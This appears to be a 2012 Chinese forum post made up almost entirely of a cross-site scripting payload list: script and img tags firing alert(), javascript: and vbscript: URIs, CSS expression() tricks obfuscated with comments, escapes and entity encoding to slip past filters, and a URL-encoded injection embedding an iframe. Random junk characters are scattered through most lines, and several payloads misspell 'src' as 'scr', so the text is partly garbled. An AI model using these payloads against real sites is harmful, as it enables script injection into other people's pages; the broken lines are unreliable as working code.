<script>alert("跨站")</script> (最常用)* N1 p: O0 |; q, ~
<img scr=javascript:alert("跨站")></img>
& h( R) d8 s1 W7 @<img scr="javascript: alert(/跨站/)></img>; R8 u P) j$ R" X7 O
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)$ s8 K6 A) c( O8 a. f0 d( _
<img scr="#" onerror=alert(/跨站/)></img>
! _0 H) z: q) }, N7 C+ R/ J9 c5 D<img scr="#" style="xss:expression(alert(/xss/));"></img>' n- K6 x9 b g3 y3 H' e( s
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
; U' ], e' f/ x, V+ p; u<img src=vbscript:msgbox ("xss")></img>; r o# _& `! Z5 b
<style> input {left:expression (alert('xss'))}</style>
, T& a4 q# e% ?<div style={left:expression (alert('xss'))}></div>+ J" o O4 Y; M" {* i9 A7 R# n2 X- h
<div style={left:exp/* */ression (alert('xss'))}></div>! D7 p( f; K( E/ Y# g
<div style={left:\0065\0078ression (alert('xss'))}></div>
/ l9 H4 ]0 T1 c0 F. w, Ihtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
5 {; b4 H0 _: c! i+ X' B6 vunicode <div style="{left:expRessioN (alert('xss'))}">
7 {$ o0 }# L# k! S6 h+ F0 s& @- {- q2 H) A3 g1 ^3 `$ p/ E1 p
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
7 [5 u& r- y- z* v |
发表于 2012-9-13 17:15:04
收藏
支持
反对